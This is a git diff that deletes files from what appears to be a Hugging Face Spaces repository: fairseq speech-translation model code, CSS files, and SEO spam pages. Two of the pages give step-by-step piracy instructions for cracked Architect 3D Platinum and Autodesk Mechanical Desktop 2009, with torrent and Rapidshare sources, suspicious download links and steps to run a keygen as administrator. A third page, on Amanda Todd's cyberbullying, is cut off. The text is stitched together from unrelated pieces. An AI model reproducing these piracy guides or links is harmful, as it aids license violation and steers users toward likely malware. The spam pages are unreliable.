tensor - lprobs = super().get_normalized_probs(net_output, log_probs, sample) - # lprobs is a (B, T, D) tensor - lprobs.batch_first = True - return lprobs - - -class BerardEncoder(FairseqEncoder): - def __init__( - self, - input_layers: List[int], - conv_layers: List[Tuple[int]], - in_channels: int, - input_feat_per_channel: int, - num_blstm_layers: int, - lstm_size: int, - dropout: float, - ): - """ - Args: - input_layers: list of linear layer dimensions. These layers are - applied to the input features and are followed by tanh and - possibly dropout. - conv_layers: list of conv2d layer configurations. A configuration is - a tuple (out_channels, conv_kernel_size, stride). - in_channels: number of input channels. - input_feat_per_channel: number of input features per channel. These - are speech features, typically 40 or 80. - num_blstm_layers: number of bidirectional LSTM layers. - lstm_size: size of the LSTM hidden (and cell) size. - dropout: dropout probability. Dropout can be applied after the - linear layers and LSTM layers but not to the convolutional - layers. - """ - super().__init__(None) - - self.input_layers = nn.ModuleList() - in_features = input_feat_per_channel - for out_features in input_layers: - if dropout > 0: - self.input_layers.append( - nn.Sequential( - nn.Linear(in_features, out_features), nn.Dropout(p=dropout) - ) - ) - else: - self.input_layers.append(nn.Linear(in_features, out_features)) - in_features = out_features - - self.in_channels = in_channels - self.input_dim = input_feat_per_channel - self.conv_kernel_sizes_and_strides = [] - self.conv_layers = nn.ModuleList() - lstm_input_dim = input_layers[-1] - for conv_layer in conv_layers: - out_channels, conv_kernel_size, conv_stride = conv_layer - self.conv_layers.append( - nn.Conv2d( - in_channels, - out_channels, - conv_kernel_size, - stride=conv_stride, - padding=conv_kernel_size // 2, - ) - ) - self.conv_kernel_sizes_and_strides.append((conv_kernel_size, conv_stride)) - in_channels = out_channels - lstm_input_dim //= conv_stride - - lstm_input_dim *= conv_layers[-1][0] - self.lstm_size = lstm_size - self.num_blstm_layers = num_blstm_layers - self.lstm = nn.LSTM( - input_size=lstm_input_dim, - hidden_size=lstm_size, - num_layers=num_blstm_layers, - dropout=dropout, - bidirectional=True, - ) - self.output_dim = 2 * lstm_size # bidirectional - if dropout > 0: - self.dropout = nn.Dropout(p=dropout) - else: - self.dropout = None - - def forward(self, src_tokens, src_lengths=None, **kwargs): - """ - Args - src_tokens: padded tensor (B, T, C * feat) - src_lengths: tensor of original lengths of input utterances (B,) - """ - bsz, max_seq_len, _ = src_tokens.size() - # (B, C, T, feat) - x = ( - src_tokens.view(bsz, max_seq_len, self.in_channels, self.input_dim) - .transpose(1, 2) - .contiguous() - ) - - for input_layer in self.input_layers: - x = input_layer(x) - x = torch.tanh(x) - - for conv_layer in self.conv_layers: - x = conv_layer(x) - - bsz, _, output_seq_len, _ = x.size() - - # (B, C, T, feat) -> (B, T, C, feat) -> (T, B, C, feat) -> - # (T, B, C * feat) - x = x.transpose(1, 2).transpose(0, 1).contiguous().view(output_seq_len, bsz, -1) - - input_lengths = src_lengths.clone() - for k, s in self.conv_kernel_sizes_and_strides: - p = k // 2 - input_lengths = (input_lengths.float() + 2 * p - k) / s + 1 - input_lengths = input_lengths.floor().long() - - packed_x = nn.utils.rnn.pack_padded_sequence(x, input_lengths) - - h0 = x.new(2 * self.num_blstm_layers, bsz, self.lstm_size).zero_() - c0 = x.new(2 * self.num_blstm_layers, bsz, self.lstm_size).zero_() - packed_outs, _ = self.lstm(packed_x, (h0, c0)) - - # unpack outputs and apply dropout - x, output_lengths = nn.utils.rnn.pad_packed_sequence(packed_outs) - if self.dropout is not None: - x = self.dropout(x) - - encoder_padding_mask = ( - lengths_to_padding_mask(output_lengths).to(src_tokens.device).t() - ) - - return { - "encoder_out": x, # (T, B, C) - "encoder_padding_mask": encoder_padding_mask, # (T, B) - } - - def reorder_encoder_out(self, encoder_out, new_order): - encoder_out["encoder_out"] = encoder_out["encoder_out"].index_select( - 1, new_order - ) - encoder_out["encoder_padding_mask"] = encoder_out[ - "encoder_padding_mask" - ].index_select(1, new_order) - return encoder_out - - -class MLPAttention(nn.Module): - """The original attention from Badhanau et al. (2014) - - https://arxiv.org/abs/1409.0473, based on a Multi-Layer Perceptron. - The attention score between position i in the encoder and position j in the - decoder is: alpha_ij = V_a * tanh(W_ae * enc_i + W_ad * dec_j + b_a) - """ - - def __init__(self, decoder_hidden_state_dim, context_dim, attention_dim): - super().__init__() - - self.context_dim = context_dim - self.attention_dim = attention_dim - # W_ae and b_a - self.encoder_proj = nn.Linear(context_dim, self.attention_dim, bias=True) - # W_ad - self.decoder_proj = nn.Linear( - decoder_hidden_state_dim, self.attention_dim, bias=False - ) - # V_a - self.to_scores = nn.Linear(self.attention_dim, 1, bias=False) - - def forward(self, decoder_state, source_hids, encoder_padding_mask): - """The expected input dimensions are: - decoder_state: bsz x decoder_hidden_state_dim - source_hids: src_len x bsz x context_dim - encoder_padding_mask: src_len x bsz - """ - src_len, bsz, _ = source_hids.size() - # (src_len*bsz) x context_dim (to feed through linear) - flat_source_hids = source_hids.view(-1, self.context_dim) - # (src_len*bsz) x attention_dim - encoder_component = self.encoder_proj(flat_source_hids) - # src_len x bsz x attention_dim - encoder_component = encoder_component.view(src_len, bsz, self.attention_dim) - # 1 x bsz x attention_dim - decoder_component = self.decoder_proj(decoder_state).unsqueeze(0) - # Sum with broadcasting and apply the non linearity - # src_len x bsz x attention_dim - hidden_att = torch.tanh( - (decoder_component + encoder_component).view(-1, self.attention_dim) - ) - # Project onto the reals to get attentions scores (src_len x bsz) - attn_scores = self.to_scores(hidden_att).view(src_len, bsz) - - # Mask + softmax (src_len x bsz) - if encoder_padding_mask is not None: - attn_scores = ( - attn_scores.float() - .masked_fill_(encoder_padding_mask, float("-inf")) - .type_as(attn_scores) - ) # FP16 support: cast to float and back - # srclen x bsz - normalized_masked_attn_scores = F.softmax(attn_scores, dim=0) - - # Sum weighted sources (bsz x context_dim) - attn_weighted_context = ( - source_hids * normalized_masked_attn_scores.unsqueeze(2) - ).sum(dim=0) - - return attn_weighted_context, normalized_masked_attn_scores - - -class LSTMDecoder(FairseqIncrementalDecoder): - def __init__( - self, - dictionary, - embed_dim, - num_layers, - hidden_size, - dropout, - encoder_output_dim, - attention_dim, - output_layer_dim, - ): - """ - Args: - dictionary: target text dictionary. - embed_dim: embedding dimension for target tokens. - num_layers: number of LSTM layers. - hidden_size: hidden size for LSTM layers. - dropout: dropout probability. Dropout can be applied to the - embeddings, the LSTM layers, and the context vector. - encoder_output_dim: encoder output dimension (hidden size of - encoder LSTM). - attention_dim: attention dimension for MLP attention. - output_layer_dim: size of the linear layer prior to output - projection. - """ - super().__init__(dictionary) - self.num_layers = num_layers - self.hidden_size = hidden_size - num_embeddings = len(dictionary) - padding_idx = dictionary.pad() - self.embed_tokens = nn.Embedding(num_embeddings, embed_dim, padding_idx) - if dropout > 0: - self.dropout = nn.Dropout(p=dropout) - else: - self.dropout = None - - self.layers = nn.ModuleList() - for layer_id in range(num_layers): - input_size = embed_dim if layer_id == 0 else encoder_output_dim - self.layers.append( - nn.LSTMCell(input_size=input_size, hidden_size=hidden_size) - ) - - self.context_dim = encoder_output_dim - self.attention = MLPAttention( - decoder_hidden_state_dim=hidden_size, - context_dim=encoder_output_dim, - attention_dim=attention_dim, - ) - - self.deep_output_layer = nn.Linear( - hidden_size + encoder_output_dim + embed_dim, output_layer_dim - ) - self.output_projection = nn.Linear(output_layer_dim, num_embeddings) - - def forward( - self, prev_output_tokens, encoder_out=None, incremental_state=None, **kwargs - ): - encoder_padding_mask = encoder_out["encoder_padding_mask"] - encoder_outs = encoder_out["encoder_out"] - - if incremental_state is not None: - prev_output_tokens = prev_output_tokens[:, -1:] - bsz, seqlen = prev_output_tokens.size() - - srclen = encoder_outs.size(0) - - # embed tokens - embeddings = self.embed_tokens(prev_output_tokens) - x = embeddings - if self.dropout is not None: - x = self.dropout(x) - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - - # initialize previous states (or get from cache during incremental - # generation) - cached_state = utils.get_incremental_state( - self, incremental_state, "cached_state" - ) - if cached_state is not None: - prev_hiddens, prev_cells = cached_state - else: - prev_hiddens = [encoder_out["encoder_out"].mean(dim=0)] * self.num_layers - prev_cells = [x.new_zeros(bsz, self.hidden_size)] * self.num_layers - - attn_scores = x.new_zeros(bsz, srclen) - attention_outs = [] - outs = [] - for j in range(seqlen): - input = x[j, :, :] - attention_out = None - for i, layer in enumerate(self.layers): - # the previous state is one layer below except for the bottom - # layer where the previous state is the state emitted by the - # top layer - hidden, cell = layer( - input, - ( - prev_hiddens[(i - 1) % self.num_layers], - prev_cells[(i - 1) % self.num_layers], - ), - ) - if self.dropout is not None: - hidden = self.dropout(hidden) - prev_hiddens[i] = hidden - prev_cells[i] = cell - if attention_out is None: - attention_out, attn_scores = self.attention( - hidden, encoder_outs, encoder_padding_mask - ) - if self.dropout is not None: - attention_out = self.dropout(attention_out) - attention_outs.append(attention_out) - input = attention_out - - # collect the output of the top layer - outs.append(hidden) - - # cache previous states (no-op except during incremental generation) - utils.set_incremental_state( - self, incremental_state, "cached_state", (prev_hiddens, prev_cells) - ) - - # collect outputs across time steps - x = torch.cat(outs, dim=0).view(seqlen, bsz, self.hidden_size) - attention_outs_concat = torch.cat(attention_outs, dim=0).view( - seqlen, bsz, self.context_dim - ) - - # T x B x C -> B x T x C - x = x.transpose(0, 1) - attention_outs_concat = attention_outs_concat.transpose(0, 1) - - # concat LSTM output, attention output and embedding - # before output projection - x = torch.cat((x, attention_outs_concat, embeddings), dim=2) - x = self.deep_output_layer(x) - x = torch.tanh(x) - if self.dropout is not None: - x = self.dropout(x) - # project back to size of vocabulary - x = self.output_projection(x) - - # to return the full attn_scores tensor, we need to fix the decoder - # to account for subsampling input frames - # return x, attn_scores - return x, None - - def reorder_incremental_state(self, incremental_state, new_order): - super().reorder_incremental_state(incremental_state, new_order) - cached_state = utils.get_incremental_state( - self, incremental_state, "cached_state" - ) - if cached_state is None: - return - - def reorder_state(state): - if isinstance(state, list): - return [reorder_state(state_i) for state_i in state] - return state.index_select(0, new_order) - - new_state = tuple(map(reorder_state, cached_state)) - utils.set_incremental_state(self, incremental_state, "cached_state", new_state) - - -@register_model_architecture(model_name="s2t_berard", arch_name="s2t_berard") -def berard(args): - """The original version: "End-to-End Automatic Speech Translation of - Audiobooks" (https://arxiv.org/abs/1802.04200) - """ - args.input_layers = getattr(args, "input_layers", "[256, 128]") - args.conv_layers = getattr(args, "conv_layers", "[(16, 3, 2), (16, 3, 2)]") - args.num_blstm_layers = getattr(args, "num_blstm_layers", 3) - args.lstm_size = getattr(args, "lstm_size", 256) - args.dropout = getattr(args, "dropout", 0.2) - args.decoder_embed_dim = getattr(args, "decoder_embed_dim", 128) - args.decoder_num_layers = getattr(args, "decoder_num_layers", 2) - args.decoder_hidden_dim = getattr(args, "decoder_hidden_dim", 512) - args.attention_dim = getattr(args, "attention_dim", 512) - args.output_layer_dim = getattr(args, "output_layer_dim", 128) - args.load_pretrained_encoder_from = getattr( - args, "load_pretrained_encoder_from", None - ) - args.load_pretrained_decoder_from = getattr( - args, "load_pretrained_decoder_from", None - ) - - -@register_model_architecture(model_name="s2t_berard", arch_name="s2t_berard_256_3_3") -def berard_256_3_3(args): - """Used in - * "Harnessing Indirect Training Data for End-to-End Automatic Speech - Translation: Tricks of the Trade" (https://arxiv.org/abs/1909.06515) - * "CoVoST: A Diverse Multilingual Speech-To-Text Translation Corpus" - (https://arxiv.org/pdf/2002.01320.pdf) - * "Self-Supervised Representations Improve End-to-End Speech Translation" - (https://arxiv.org/abs/2006.12124) - """ - args.decoder_num_layers = getattr(args, "decoder_num_layers", 3) - berard(args) - - -@register_model_architecture(model_name="s2t_berard", arch_name="s2t_berard_512_3_2") -def berard_512_3_2(args): - args.num_blstm_layers = getattr(args, "num_blstm_layers", 3) - args.lstm_size = getattr(args, "lstm_size", 512) - args.dropout = getattr(args, "dropout", 0.3) - args.decoder_embed_dim = getattr(args, "decoder_embed_dim", 256) - args.decoder_num_layers = getattr(args, "decoder_num_layers", 2) - args.decoder_hidden_dim = getattr(args, "decoder_hidden_dim", 1024) - args.attention_dim = getattr(args, "attention_dim", 512) - args.output_layer_dim = getattr(args, "output_layer_dim", 256) - berard(args) - - -@register_model_architecture(model_name="s2t_berard", arch_name="s2t_berard_512_5_3") -def berard_512_5_3(args): - args.num_blstm_layers = getattr(args, "num_blstm_layers", 5) - args.lstm_size = getattr(args, "lstm_size", 512) - args.dropout = getattr(args, "dropout", 0.3) - args.decoder_embed_dim = getattr(args, "decoder_embed_dim", 256) - args.decoder_num_layers = getattr(args, "decoder_num_layers", 3) - args.decoder_hidden_dim = getattr(args, "decoder_hidden_dim", 1024) - args.attention_dim = getattr(args, "attention_dim", 512) - args.output_layer_dim = getattr(args, "output_layer_dim", 256) - berard(args) diff --git a/spaces/srishtiganguly/maskrcnn/style.css b/spaces/srishtiganguly/maskrcnn/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/srishtiganguly/maskrcnn/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/sssdtgvg/Sex/style.css b/spaces/sssdtgvg/Sex/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/sssdtgvg/Sex/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/stomexserde/gpt4-ui/Examples/Architect 3D Platinum 17.5.1.1000 (Serial-ECZ) [ChingLiu] Serial Key Keygen.md b/spaces/stomexserde/gpt4-ui/Examples/Architect 3D Platinum 17.5.1.1000 (Serial-ECZ) [ChingLiu] Serial Key Keygen.md deleted file mode 100644 index 1f26ae33470a2ed12b1f5ddc43b2139c750ba6ee..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Architect 3D Platinum 17.5.1.1000 (Serial-ECZ) [ChingLiu] Serial Key Keygen.md +++ /dev/null @@ -1,38 +0,0 @@ -
      -

      How to Download and Install Architect 3D Platinum 17.5.1.1000 for Free

      -

      If you are looking for a powerful and easy-to-use software to design your dream home, Architect 3D Platinum 17.5.1.1000 is the perfect choice. This software allows you to draw up plans, construct and view your house in 3D, personalize your interior and exterior, and create stunning 3D effects and virtual tours. You can also convert your 2D objects to 3D, rework from your scanned plans, and embed photographed objects with PhotoView™.

      -

      However, this software is not cheap. It costs 269,99 € on the official website[^2^]. But don't worry, there is a way to get it for free. All you need is a serial key and a keygen from ChingLiu.

      -

      Architect 3D Platinum 17.5.1.1000 (Serial-ECZ) [ChingLiu] Serial Key keygen


      Downloadhttps://urlgoal.com/2uIbtW



      -

      ChingLiu is a legendary file sharer who is known for cracking the toughest apps first, for doing it right, and for doing it often[^3^]. He has uploaded a torrent file of Architect 3D Platinum 17.5.1.1000 with a serial key and a keygen on The Pirate Bay. Here are the steps to download and install it:

      -
        -
      1. Go to The Pirate Bay and search for "Architect 3D Platinum 17.5.1.1000 (Serial-ECZ) [ChingLiu]".
      2. -
      3. Download the torrent file and open it with a torrent client such as uTorrent or BitTorrent.
      4. -
      5. Extract the files from the downloaded folder using WinRAR or 7-Zip.
      6. -
      7. Run the setup.exe file and follow the installation instructions.
      8. -
      9. When prompted, enter the serial key from the Serial.txt file.
      10. -
      11. After the installation is complete, do not run the program yet.
      12. -
      13. Copy the keygen.exe file from the Crack folder and paste it into the installation directory (usually C:\Program Files (x86)\Architecte 3D Platinum).
      14. -
      15. Run the keygen.exe file as administrator and click on Generate.
      16. -
      17. Copy the generated activation code and paste it into the program when asked.
      18. -
      19. Congratulations! You have successfully installed Architect 3D Platinum 17.5.1.1000 for free.
      20. -
      -

      Note: This method is for educational purposes only. We do not condone piracy or illegal downloading of software. Please support the developers by purchasing the software from their official website if you can afford it.

      Why Choose Architect 3D Platinum 17.5.1.1000?

      -

      Architect 3D Platinum 17.5.1.1000 is the ultimate solution for designing your dream home. Whether you are a beginner or a professional, you can use this software to create realistic and detailed plans of your house, garden, and swimming pool. You can also customize every aspect of your project, from the materials, colors, textures, furniture, lighting, and landscaping.

      -

      With Architect 3D Platinum 17.5.1.1000, you can also enjoy the following features:

      -
        -
      • A comprehensive library of over 8000 3D objects and textures to decorate your home.
      • -
      • A powerful 3D rendering engine that allows you to create stunning photorealistic images and videos of your project.
      • -
      • A swimming pool designer that lets you design your own pool shape, size, depth, and accessories.
      • -
      • A virtual tour mode that lets you explore your project in 3D from different angles and perspectives.
      • -
      • A PhotoView™ mode that lets you insert your own photos into your project and edit them with filters and effects.
      • -
      • A 2D/3D converter that lets you transform any 2D object into a 3D object with a simple click.
      • -
      • A scan plan mode that lets you import your scanned plans and trace over them with the software tools.
      • -
      -

      Architect 3D Platinum 17.5.1.1000 is compatible with Windows XP, Vista, 7, 8, and 10. It also supports the import and export of DXF/DWG files from AutoCAD® and SketchUp®.

      -

      How to Use Architect 3D Platinum 17.5.1.1000?

      -

      Using Architect 3D Platinum 17.5.1.1000 is easy and fun. You can start by choosing one of the pre-designed templates or creating your own from scratch. You can then draw the walls, doors, windows, stairs, roofs, and floors of your house using the intuitive tools and guides. You can also adjust the dimensions, angles, heights, and slopes of your elements with precision.

      -

      -

      Next, you can decorate your interior and exterior with the thousands of objects and textures available in the library. You can drag and drop them into your project and resize, rotate, and move them as you wish. You can also change the materials, colors, patterns, and styles of your objects to suit your taste.

      -

      Finally, you can view your project in 3D from different angles and perspectives. You can also create photorealistic images and videos of your project using the advanced rendering options. You can also take a virtual tour of your project in 3D and walk around it as if you were there. You can also insert your own photos into your project and edit them with PhotoView™.

      7196e7f11a
      -
      -
      \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Autodesk Mechanical Desktop 2009 Keygen Rapidshare.md b/spaces/stomexserde/gpt4-ui/Examples/Autodesk Mechanical Desktop 2009 Keygen Rapidshare.md deleted file mode 100644 index 3933ece2367df2c6e46d85ebb121d293e7a1d505..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Autodesk Mechanical Desktop 2009 Keygen Rapidshare.md +++ /dev/null @@ -1,84 +0,0 @@ - -

      Autodesk Mechanical Desktop 2009 Keygen Rapidshare: What You Need to Know

      -

      If you are looking for a powerful and versatile software for mechanical design and engineering, you might have heard of Autodesk Mechanical Desktop 2009. This software is a part of the Autodesk Inventor suite, which provides a comprehensive solution for 3D mechanical design, simulation, documentation, and product data management. However, this software is not cheap, and you might be tempted to look for a free or cracked version online. One of the ways to do that is to use a keygen and download the software from Rapidshare. But what are the risks and benefits of doing that? In this article, we will explain everything you need to know about Autodesk Mechanical Desktop 2009 keygen Rapidshare, including what they are, how they work, and what are the pros and cons of using them.

      -

      Introduction

      -

      What is Autodesk Mechanical Desktop 2009?

      -

      Autodesk Mechanical Desktop 2009 is a software that helps you create and modify mechanical parts and assemblies in 2D and 3D. It allows you to design complex shapes, apply materials and textures, perform stress analysis, create drawings and bills of materials, and export your models to various formats. It also integrates with other Autodesk products, such as AutoCAD, Inventor, Vault, and Revit. Autodesk Mechanical Desktop 2009 is designed for professionals who need a high level of productivity and accuracy in their mechanical design projects.

      -

      Autodesk Mechanical Desktop 2009 Keygen Rapidshare


      Downloadhttps://urlgoal.com/2uIbhh



      -

      What is a keygen?

      -

      A keygen is a small program that generates serial keys or activation codes for software. A serial key is a unique combination of letters and numbers that identifies your copy of the software and allows you to use it legally. A keygen can help you bypass the registration or activation process of the software and use it for free. However, using a keygen is considered piracy and violates the terms of service and license agreement of the software. It can also expose your computer to malware, viruses, or legal actions.

      -

      What is Rapidshare?

      -

      Rapidshare is a file hosting service that allows users to upload and download files from its servers. It was one of the most popular file sharing platforms in the world until it shut down in 2015 due to legal issues and financial losses. Rapidshare was often used by people who wanted to share pirated or illegal content, such as movies, music, games, or software. However, downloading files from Rapidshare was not always safe or reliable, as they could be corrupted, infected, or removed at any time.

      -

      How to download and install Autodesk Mechanical Desktop 2009

      -

      System requirements

      -

      Before you download and install Autodesk Mechanical Desktop 2009, you need to make sure that your computer meets the minimum system requirements for the software. According to the official website, these are:

      -
        -
      • Operating system: Windows XP SP2 or Windows Vista
      • -
      • Processor: Intel Pentium 4 or AMD Athlon XP with SSE2 technology
      • -
      • Memory: 1 GB RAM (2 GB recommended)
      • -
      • Hard disk: 3 GB free space
      • -
      • Graphics: 128 MB DirectX 9.0c compatible graphics card with Shader Model 2.0 support
      • -
      • Display: 1024 x 768 resolution with True Color
      • -
      • Internet connection: for web downloads and activation
      • -
      -

      If your computer does not meet these requirements, you might experience problems or errors while running the software.

      -

      Download links

      -

      The official website of Autodesk does not offer any download links for Autodesk Mechanical Desktop 2009, as it is an outdated and discontinued product. The only way to get the software legally is to buy a license from an authorized reseller or a third-party website. However, these options are not cheap and might not be available in your region.

      -

      Alternatively, you can try to find a download link for Autodesk Mechanical Desktop 2009 on Rapidshare or other file sharing platforms. However, this is not recommended, as you might end up downloading a fake, corrupted, or infected file that could harm your computer or compromise your personal data. Moreover, downloading the software from Rapidshare is illegal and violates the intellectual property rights of Autodesk.

      -

      If you still want to take the risk and download Autodesk Mechanical Desktop 2009 from Rapidshare, you need to do some research and find a reliable and working link. You can use search engines, forums, blogs, or social media to look for reviews, comments, or feedback from other users who have tried the same link. You should also check the file size, format, and extension before downloading it. A typical file size for Autodesk Mechanical Desktop 2009 is around 1.5 GB, and the file format should be either ISO or RAR.

      -

      -

      Installation steps

      -

      Once you have downloaded the file from Rapidshare, you need to extract it using a program like WinRAR or 7-Zip. You should see a folder containing several files, including an ISO file and a keygen file. The ISO file is a disk image that contains the setup files for the software. The keygen file is a program that generates serial keys for the software.

      -

      To install Autodesk Mechanical Desktop 2009 from the ISO file, you need to mount it using a program like Daemon Tools or Virtual CloneDrive. This will create a virtual drive on your computer that will act as if you have inserted a CD or DVD. You can then open the virtual drive and run the setup.exe file to start the installation process.

      -

      The installation process is straightforward and similar to any other software installation. You just need to follow the instructions on the screen and choose the options that suit your preferences. However, when you are asked to enter a serial key or an activation code, you need to use the keygen file that you downloaded along with the ISO file.

      -

      How to use a keygen to activate Autodesk Mechanical Desktop 2009

      -

      What is a serial key and why do you need it?

      -

      A serial key is a unique combination of letters and numbers that identifies your copy of the software and allows you to use it legally. It is usually provided by the software developer or vendor when you purchase a license for the software. Without a valid serial key, you cannot activate or register the software, and you might face limitations or restrictions in its functionality.

      -

      How to find a working keygen for Autodesk Mechanical Desktop 2009

      -

      A keygen is a small program that generates serial keys or activation codes for software. A keygen can help you bypass the registration or activation process of the software and use it for free. However, using a keygen is considered piracy and violates the terms of service and license agreement of the software. It can also expose your computer to malware, viruses, or legal actions.

      -

      Finding a working keygen for Autodesk Mechanical Desktop 2009 is not easy, as most of them are fake, outdated, or infected. You need to do some research and find a reliable and working keygen that matches your version of the software. You can use search engines, forums, blogs, or social media to look for reviews, comments, or feedback from other users who have tried the same keygen. You should also check the file size, format, and extension before downloading it. A typical file size for a keygen is around 1 MB, and the file format should be either EXE or ZIP.

      -

      How to use the keygen to generate a serial key

      -

      To use the keygen to generate a serial key for Autodesk Mechanical Desktop 2009, you need to run it as an administrator on your computer. You should see a window with several options and buttons. You need to select your version of the software from the drop-down menu and click on the Generate button to generate a random serial key. You should see a series of letters and numbers in the text box. You need to copy this serial key and paste it in the installation window of the software when you are asked to enter it. You should also save this serial key somewhere safe, as you might need it later for verification or reinstallation.

      -

      How to enter the serial key and activate the software

      -

      To enter the serial key and activate Autodesk Mechanical Desktop 2009, you need to follow the installation steps until you reach the screen that asks you to enter a serial key or an activation code. You need to paste the serial key that you generated with the keygen in the text box and click on the Next button. The software will then verify your serial key and proceed with the installation. If your serial key is valid, you should see a message that says "Activation successful". If your serial key is invalid, you should see a message that says "Activation failed". In that case, you need to go back to the keygen and generate another serial key until you find one that works.

      -

      After you have activated the software, you can finish the installation and launch the software. You should be able to use all the features and functions of Autodesk Mechanical Desktop 2009 without any limitations or restrictions.

      -

      Pros and cons of using a keygen for Autodesk Mechanical Desktop 2009

      -

      Pros: free, easy, and fast

      -

      The main advantage of using a keygen for Autodesk Mechanical Desktop 2009 is that it allows you to use the software for free, without paying for a license or a subscription. This can save you a lot of money, especially if you are a student, a hobbyist, or a freelancer who cannot afford the official price of the software. Moreover, using a keygen is relatively easy and fast, as you only need to download, run, and copy-paste a few files and codes. You do not need to go through a complicated or lengthy registration or activation process.

      -

      Cons: illegal, risky, and unethical

      -

      The main disadvantage of using a keygen for Autodesk Mechanical Desktop 2009 is that it is illegal, risky, and unethical. By using a keygen, you are violating the intellectual property rights of Autodesk and breaking the terms of service and license agreement of the software. This can expose you to legal actions, fines, or penalties from Autodesk or other authorities. Moreover, using a keygen can be risky for your computer and your personal data, as you might download or run files that are infected with malware, viruses, or spyware. These can damage your system, steal your information, or compromise your security. Furthermore, using a keygen is unethical, as you are depriving Autodesk of its rightful revenue and undermining its efforts to develop and improve its products. You are also disrespecting the work and creativity of the developers and engineers who created the software.

      -

      Conclusion

      -

      Summary of the main points

      -

      In this article, we have explained everything you need to know about Autodesk Mechanical Desktop 2009 keygen Rapidshare, including what they are, how they work, and what are the pros and cons of using them. We have also provided you with some tips and steps on how to download, install, and activate Autodesk Mechanical Desktop 2009 using a keygen.

      -

      Recommendations and alternatives

      -

      While using a keygen for Autodesk Mechanical Desktop 2009 might seem tempting, we do not recommend it, as it is illegal, risky, and unethical. Instead, we suggest that you buy a legal license for the software from an authorized reseller or a third-party website. This way, you can support Autodesk and its products, enjoy all the benefits and features of the software, and avoid any problems or issues with your computer or your data.

      -

      If you cannot afford to buy a license for Autodesk Mechanical Desktop 2009, you can also look for some alternatives that are free or cheaper than the original software. For example, you can try some open-source or freeware software that offer similar or comparable functions for mechanical design and engineering. Some examples are FreeCAD, LibreCAD, Blender, or SketchUp. These software are legal, safe, and ethical to use.

      -

      We hope that this article has been helpful and informative for you. If you have any questions or comments about Autodesk Mechanical Desktop 2009 keygen Rapidshare, feel free to leave them below.

      -

      Frequently Asked Questions

      -
        -
      • What is Autodesk Mechanical Desktop 2009?
      • -

        Autodesk Mechanical Desktop 2009 is a software that helps you create and modify mechanical parts and assemblies in 2D and 3D.It is a part of the Autodesk Inventor suite, which provides a comprehensive solution for 3D mechanical design, simulation, documentation, and product data management.

        -
      • What is a keygen?
      • -

        A keygen is a small program that generates serial keys or activation codes for software. A serial key is a unique combination of letters and numbers that identifies your copy of the software and allows you to use it legally. A keygen can help you bypass the registration or activation process of the software and use it for free. However, using a keygen is considered piracy and violates the terms of service and license agreement of the software. It can also expose your computer to malware, viruses, or legal actions.

        -
      • What is Rapidshare?
      • -

        Rapidshare is a file hosting service that allows users to upload and download files from its servers. It was one of the most popular file sharing platforms in the world until it shut down in 2015 due to legal issues and financial losses. Rapidshare was often used by people who wanted to share pirated or illegal content, such as movies, music, games, or software. However, downloading files from Rapidshare was not always safe or reliable, as they could be corrupted, infected, or removed at any time.

        -
      • How to download and install Autodesk Mechanical Desktop 2009 using a keygen?
      • -

        To download and install Autodesk Mechanical Desktop 2009 using a keygen, you need to follow these steps:

        -
          -
        1. Find a reliable and working download link for Autodesk Mechanical Desktop 2009 on Rapidshare or other file sharing platforms.
        2. -
        3. Download the file from Rapidshare and extract it using a program like WinRAR or 7-Zip.
        4. -
        5. Mount the ISO file using a program like Daemon Tools or Virtual CloneDrive.
        6. -
        7. Run the setup.exe file and follow the installation instructions.
        8. -
        9. When asked to enter a serial key or an activation code, use the keygen file that you downloaded along with the ISO file to generate one.
        10. -
        11. Paste the serial key in the installation window and click on the Next button.
        12. -
        13. Finish the installation and launch the software.
        14. -
        -
      • What are the pros and cons of using a keygen for Autodesk Mechanical Desktop 2009?
      • -

        The pros and cons of using a keygen for Autodesk Mechanical Desktop 2009 are:

        -
          -
        • Pros: free, easy, and fast
        • -
        • Cons: illegal, risky, and unethical
        • -
        -

      b2dd77e56b
      -
      -
      \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Blogtv Amanda Todd.md b/spaces/stomexserde/gpt4-ui/Examples/Blogtv Amanda Todd.md deleted file mode 100644 index 4a19865f20b7687ec41c02151a2b4af80caba945..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Blogtv Amanda Todd.md +++ /dev/null @@ -1,16 +0,0 @@ -
      -

      The Dark Side of BlogTV: How a Teenage Girl Became a Victim of Cyberbullying and Blackmail

      -

      BlogTV was a popular live video chat site that allowed users to broadcast themselves and interact with other viewers. It was also a hunting ground for predators who preyed on young and naive teens, recording their actions and using them as leverage for extortion and harassment.

      -

      Blogtv Amanda Todd


      Download Zip --->>> https://urlgoal.com/2uI6rJ



      -

      One of the most tragic cases of this phenomenon was that of Amanda Todd, a 15-year-old Canadian girl who committed suicide in 2012 after years of online abuse. Before her death, she posted a video on YouTube titled "My story: Struggling, bullying, suicide, self-harm", in which she used a series of flashcards to tell her ordeal. The video went viral after her death, receiving over 15 million views as of January 2023.

      -

